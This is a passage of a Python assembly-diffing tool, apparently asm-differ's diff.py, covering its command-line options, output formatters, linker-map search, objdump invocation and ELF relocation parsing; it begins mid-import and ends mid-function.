List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(
description="Diff MIPS, PPC, AArch64, or ARM32 assembly."
)
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="""Diff .o files rather than a whole binary. This makes it possible to
see symbol names. (Recommended)""",
)
parser.add_argument(
"-f",
"--objfile",
dest="objfile",
type=str,
help="""File path for an object file being diffed. When used
the map file isn't searched for the function given. Useful for dynamically
linked libraries."""
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="""Diff a given function in two ELFs, one being stripped and the other
one non-stripped. Requires objdump from binutils 2.33+.""",
)
parser.add_argument(
"-c",
"--source",
dest="show_source",
action="store_true",
help="Show source code (if possible). Only works with -o or -e.",
)
parser.add_argument(
"-C",
"--source-old-binutils",
dest="source_old_binutils",
action="store_true",
help="""Tweak --source handling to make it work with binutils < 2.33.
Implies --source.""",
)
parser.add_argument(
"-j",
"--section",
dest="diff_section",
default=".text",
metavar="SECTION",
help="Diff restricted to a given output section.",
)
parser.add_argument(
"-L",
"--line-numbers",
dest="show_line_numbers",
action="store_const",
const=True,
help="""Show source line numbers in output, when available. May be enabled by
default depending on diff_settings.py.""",
)
parser.add_argument(
"--no-line-numbers",
dest="show_line_numbers",
action="store_const",
const=False,
help="Hide source line numbers in output.",
)
parser.add_argument(
"--inlines",
dest="inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o or -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
metavar="LINES",
type=int,
default=0,
help="Skip the first LINES lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="""Stop disassembling at the first 'jr ra'. Some functions have
multiple return points, so use with care!""",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64 and ARM32.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
metavar="N",
type=str,
default="0",
help="""Diff position N in our img against position N + shift in the base img.
Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable
flag to pass if it is known that position 0x1234 in the base img syncs
up with position 0x4321 in our img. Not supported together with -o.""",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="""Automatically update when source/object files change.
Recommended in combination with -m.""",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="""Show a three-way diff between target asm, current asm, and asm
prior to -w rebuild. Requires -w.""",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="""Show a three-way diff between target asm, current asm, and asm
when diff.py was started. Requires -w.""",
)
parser.add_argument(
"--width",
dest="column_width",
metavar="COLS",
type=int,
default=50,
help="Sets the width of the left and right view column.",
)
parser.add_argument(
"--algorithm",
dest="algorithm",
default="levenshtein",
choices=["levenshtein", "difflib"],
help="""Diff algorithm to use. Levenshtein gives the minimum diff, while difflib
aims for long sections of equal opcodes. Defaults to %(default)s.""",
)
parser.add_argument(
"--max-size",
"--max-lines",
metavar="LINES",
dest="max_lines",
type=int,
default=1024,
help="The maximum length of the diff, in lines.",
)
parser.add_argument(
"--no-pager",
dest="no_pager",
action="store_true",
help="""Disable the pager; write output directly to stdout, then exit.
Incompatible with --watch.""",
)
parser.add_argument(
"--format",
choices=("color", "plain", "html", "json"),
default="color",
help="Output format, default is color. --format=html or json implies --no-pager.",
)
parser.add_argument(
"-U",
"--compress-matching",
metavar="N",
dest="compress_matching",
type=int,
help="""Compress streaks of matching lines, leaving N lines of context
around non-matching parts.""",
)
parser.add_argument(
"-V",
"--compress-sameinstr",
metavar="N",
dest="compress_sameinstr",
type=int,
help="""Compress streaks of lines with same instructions (but possibly
different regalloc), leaving N lines of context around other parts.""",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from collections import Counter, defaultdict
from dataclasses import asdict, dataclass, field, replace
import difflib
import enum
import html
import itertools
import json
import os
import queue
import re
import string
import struct
import subprocess
import threading
import time
import traceback
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Back, Fore, Style
import watchdog
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
show_line_numbers_default: bool
disassemble_all: bool
@dataclass
class Compress:
context: int
same_instr: bool
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
objfile: str
make: bool
source_old_binutils: bool
diff_section: str
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
compress: Optional[Compress]
show_branches: bool
show_line_numbers: bool
show_source: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
# Score options
score_stack_differences = True
penalty_stackdiff = 1
penalty_regalloc = 5
penalty_reordering = 60
penalty_insertion = 100
penalty_deletion = 100
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
show_line_numbers_default=settings.get("show_line_numbers_default", True),
disassemble_all=settings.get("disassemble_all", False)
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
arch = get_arch(project.arch_str)
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
elif args.format == "json":
formatter = JsonFormatter(arch_str=arch.name)
else:
raise ValueError(f"Unsupported --format: {args.format}")
compress = None
if args.compress_matching is not None:
compress = Compress(args.compress_matching, False)
if args.compress_sameinstr is not None:
if compress is not None:
raise ValueError(
"Cannot pass both --compress-matching and --compress-sameinstr"
)
compress = Compress(args.compress_sameinstr, True)
show_line_numbers = args.show_line_numbers
if show_line_numbers is None:
show_line_numbers = project.show_line_numbers_default
return Config(
arch=arch,
# Build/objdump options
diff_obj=args.diff_obj,
objfile=args.objfile,
make=args.make,
source_old_binutils=args.source_old_binutils,
diff_section=args.diff_section,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
compress=compress,
show_branches=args.show_branches,
show_line_numbers=show_line_numbers,
show_source=args.show_source or args.source_old_binutils,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
objdump_candidates = [
"mips-linux-gnu-objdump",
"mips64-elf-objdump",
"mips-elf-objdump",
]
for objdump_cand in objdump_candidates:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
f"Missing binutils; please ensure {' or '.join(objdump_candidates)} exists, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
for settings in ARCH_SETTINGS:
if arch_str == settings.name:
return settings
raise ValueError(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c repaints the full screen from the top line down instead of scrolling
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_LINE_NUM = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(self, line: str = "", f: Format = BasicFormat.NONE) -> None:
self.segments = [(line, f)] if line else []
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __bool__(self) -> bool:
return any(s for s, f in self.segments)
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
# If two adjacent segments have the same format, merge their lines
if (
self.segments
and other.segments
and self.segments[-1][1] == other.segments[0][1]
):
result.segments = (
self.segments[:-1]
+ [(self.segments[-1][0] + other.segments[0][0], self.segments[-1][1])]
+ other.segments[1:]
)
else:
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
return other + self
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
if i != start:
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
if chunk[i:]:
result.segments.append((chunk[i:], f))
return result
def ljust(self, column_width: int) -> "Text":
length = sum(len(x) for x, _ in self.segments)
return self + " " * max(column_width - length, 0)
@dataclass
class TableMetadata:
headers: Tuple[Text, ...]
current_score: int
max_score: int
previous_score: Optional[int]
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
"""Format a multi-column table with metadata"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@staticmethod
def outputline_texts(lines: Tuple["OutputLine", ...]) -> Tuple[Text, ...]:
return tuple([lines[0].base or Text()] + [line.fmt2 for line in lines[1:]])
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [meta.headers] + [self.outputline_texts(ls) for ls in lines]
return "\n".join(
"".join(self.apply(x.ljust(self.column_width)) for x in row) for row in rows
)
@dataclass
class AnsiFormatter(Formatter):
# Additional ansi escape codes not in colorama. See:
# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_(Select_Graphic_Rendition)_parameters
STYLE_UNDERLINE = "\x1b[4m"
STYLE_NO_UNDERLINE = "\x1b[24m"
STYLE_INVERT = "\x1b[7m"
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.DIM + Style.BRIGHT,
BasicFormat.SOURCE_FUNCTION: Style.DIM + Style.BRIGHT + STYLE_UNDERLINE,
BasicFormat.SOURCE_LINE_NUM: Fore.LIGHTBLACK_EX,
BasicFormat.SOURCE_OTHER: Style.DIM,
}
BASIC_ANSI_CODES_UNDO = {
BasicFormat.NONE: "",
BasicFormat.SOURCE_FILENAME: Style.NORMAL,
BasicFormat.SOURCE_FUNCTION: Style.NORMAL + STYLE_NO_UNDERLINE,
BasicFormat.SOURCE_OTHER: Style.NORMAL,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
undo_ansi_code = Fore.RESET
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
undo_ansi_code = self.BASIC_ANSI_CODES_UNDO.get(f, undo_ansi_code)
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{undo_ansi_code}"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [(meta.headers, False)] + [
(self.outputline_texts(line), line[1].is_data_ref) for line in lines
]
return "\n".join(
"".join(
(self.STYLE_INVERT if is_data_ref else "")
+ self.apply(x.ljust(self.column_width))
for x in row
)
for (row, is_data_ref) in rows
)
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
def table_row(line: Tuple[Text, ...], is_data_ref: bool, cell_el: str) -> str:
tr_attrs = " class='data-ref'" if is_data_ref else ""
output_row = f" <tr{tr_attrs}>"
for cell in line:
cell_html = self.apply(cell)
output_row += f"<{cell_el}>{cell_html}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
output += " <thead>\n"
output += table_row(meta.headers, False, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(
table_row(self.outputline_texts(line), line[1].is_data_ref, "td")
for line in lines
)
output += " </tbody>\n"
output += "</table>\n"
return output
@dataclass
class JsonFormatter(Formatter):
arch_str: str
def apply_format(self, chunk: str, f: Format) -> str:
# This method is unused by this formatter
return NotImplemented
def table(self, meta: TableMetadata, rows: List[Tuple["OutputLine", ...]]) -> str:
def serialize_format(s: str, f: Format) -> Dict[str, Any]:
if f == BasicFormat.NONE:
return {"text": s}
elif isinstance(f, BasicFormat):
return {"text": s, "format": f.name.lower()}
elif isinstance(f, RotationFormat):
attrs = asdict(f)
attrs.update(
{
"text": s,
"format": "rotation",
}
)
return attrs
else:
static_assert_unreachable(f)
def serialize(text: Optional[Text]) -> List[Dict[str, Any]]:
if text is None:
return []
return [serialize_format(s, f) for s, f in text.segments]
is_threeway = len(meta.headers) == 3
output: Dict[str, Any] = {}
output["arch_str"] = self.arch_str
output["header"] = {
name: serialize(h)
for h, name in zip(meta.headers, ("base", "current", "previous"))
}
output["current_score"] = meta.current_score
output["max_score"] = meta.max_score
if meta.previous_score is not None:
output["previous_score"] = meta.previous_score
output_rows: List[Dict[str, Any]] = []
for row in rows:
output_row: Dict[str, Any] = {}
output_row["key"] = row[0].key2
output_row["is_data_ref"] = row[1].is_data_ref
iters = [
("base", row[0].base, row[0].line1),
("current", row[1].fmt2, row[1].line2),
]
if is_threeway:
iters.append(("previous", row[2].fmt2, row[2].line2))
if all(line is None for _, _, line in iters):
# Skip rows that were only for displaying source code
continue
for column_name, text, line in iters:
column: Dict[str, Any] = {}
column["text"] = serialize(text)
if line:
if line.line_num is not None:
column["line"] = line.line_num
if line.branch_target is not None:
column["branch"] = line.branch_target
if line.source_lines:
column["src"] = line.source_lines
if line.comment is not None:
column["src_comment"] = line.comment
if line.source_line_num is not None:
column["src_line"] = line.source_line_num
if line or column["text"]:
output_row[column_name] = column
output_rows.append(output_row)
output["rows"] = output_rows
return json.dumps(output)
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
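# Illustrative example (not part of the original script): symbol_formatter
# returns a memoizing function, so each distinct symbol keeps a stable color:
#   fmt = symbol_formatter("branch", base_index=0)
#   fmt("lbl_80001234")  # RotationFormat(index=0, ...)
#   fmt("lbl_80005678")  # RotationFormat(index=1, ...)
#   fmt("lbl_80001234")  # same RotationFormat as the first call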
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> Optional[int]:
expr = expr.strip().replace(":", "")
if expr == "":
return None
return int(expr, 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str) -> str:
try:
ind = dump.index("\n", dump.index(f"<{fn_name}>:"))
return dump[ind + 1 :]
except ValueError:
return ""
def serialize_data_references(references: List[Tuple[int, int, str]]) -> str:
return "".join(
f"DATAREF {text_offset} {from_offset} {from_section}\n"
for (text_offset, from_offset, from_section) in references
)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
flags = []
if config.show_line_numbers or config.show_source:
flags.append("--line-numbers")
if config.show_source:
flags.append("--source")
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
obj_data: Optional[bytes] = None
if config.diff_obj:
with open(target, "rb") as f:
obj_data = f.read()
return preprocess_objdump_out(restrict, obj_data, out, config)
def preprocess_objdump_out(
restrict: Optional[str], obj_data: Optional[bytes], objdump_out: str, config: Config
) -> str:
"""
Preprocess the output of objdump into a format that `process()` expects.
This format is suitable for saving to disk with `--write-asm`.
- Optionally filter the output to a single function (`restrict`)
- Otherwise, strip objdump header (7 lines)
- Prepend .data references ("DATAREF" lines) when working with object files
"""
out = objdump_out
if restrict is not None:
out = restrict_to_function(out, restrict)
else:
for i in range(7):
out = out[out.find("\n") + 1 :]
out = out.rstrip("\n")
if obj_data:
out = serialize_data_references(parse_elf_data_references(obj_data, config)) + out
return out
def search_map_file(
fn_name: str, project: ProjectSettings, config: Config
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" " + config.diff_section):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
section_pattern = re.escape(config.diff_section)
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of " + section_pattern + r"\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def parse_elf_data_references(data: bytes, config: Config) -> List[Tuple[int, int, str]]:
e_ident = data[:16]
if e_ident[:4] != b"\x7FELF":
return []
SHT_SYMTAB = 2
SHT_REL = 9
SHT_RELA = 4
is_32bit = e_ident[4] == 1
is_little_endian = e_ident[5] == 1
str_end = "<" if is_little_endian else ">"
str_off = "I" if is_32bit else "Q"
def read(spec: str, offset: int) -> Tuple[int, ...]:
spec = spec.replace("P", str_off)
size = struct.calcsize(spec)
return struct.unpack(str_end + spec, data[offset : offset + size])
(
e_type,
e_machine,
e_version,
e_entry,
e_phoff,
e_shoff,
e_flags,
e_ehsize,
e_phentsize,
e_phnum,
e_shentsize,
e_shnum,
e_shstrndx,
) = read("HHIPPPIHHHHHH", 16)
if e_type != 1: # relocatable
return []
assert e_shoff != 0
assert e_shnum != 0 # don't support > 0xFF00 sections
assert e_shstrndx != 0
@dataclass
class Section:
sh_name: int
sh_type: int
sh_flags: int
sh_addr: int
sh_offset: int
sh_size: int
sh_link: int
sh_info: int
sh_addralign: int
sh_entsize: int
sections = [
Section(*read("IIPPPPIIPP", e_shoff + i * e_shentsize)) for i in range(e_shnum)
]
shstr = sections[e_shstrndx]
sec_name_offs = [shstr.sh_offset + s.sh_name for s in sections]
sec_names = [data[offset : data.index(b"\0", offset)] for offset in sec_name_offs]
symtab_sections = [i for i in range(e_shnum) if sections[i].sh_type == SHT_SYMTAB]
assert len(symtab_sections) == 1
symtab = sections[symtab_sections[0]]
section_name = config.diff_section.encode("utf-8")
text_sections = [i for i in range(e_shnum) if sec_names[i] == section_name and sections[i].sh_size != 0]
if len(text_sections) != 1:
return []
text_section = text_sections[0]
ret: List[Tuple[int, int, str]] = []
for s in sections:
if s.sh_type == SHT_REL or s.sh_type == SHT_RELA:
if s.sh_info == text_section:
# Skip section_name -> section_name references
continue
sec_name = sec_names[s.sh_info].decode("latin1")
if sec_name == ".mwcats.text":
# Skip Metrowerks CATS Utility section
continue
sec_base = sections[s.sh_info].sh_offset
for i in range(0, s.sh_size, s.sh_entsize):
if s.sh_type == SHT_REL:
r_offset, r_info = read("PP", s.sh_offset + i)
else:
r_offset, r_info, r_addend = read("PPP", s.sh_offset + i)
if is_32bit:
r_sym = r_info >> 8
r_type = r_info & 0xFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_value, st_size, st_info, st_other, st_shndx = read(
"IIIBBH", sym_offset
)
else:
r_sym = r_info >> 32
r_type = r_info & 0xFFFFFFFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_info, st_other, st_shndx, st_value, st_size = read(
"IBBHQQ", sym_offset
)
if st_shndx == text_section:
if s.sh_type == SHT_REL:
if e_machine == 8 and r_type == 2: # R_MIPS_32
(r_addend,) = read("I", sec_base + r_offset)
else:
continue
text_offset = (st_value + r_addend) & 0xFFFFFFFF
ret.append((text_offset, r_offset, sec_name))
return ret
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
if project.disassemble_all:
disassemble_flag = "-D"
else:
disassemble_flag = "-d"
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = [disassemble_flag, "-rz", "-j", config.diff_section]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
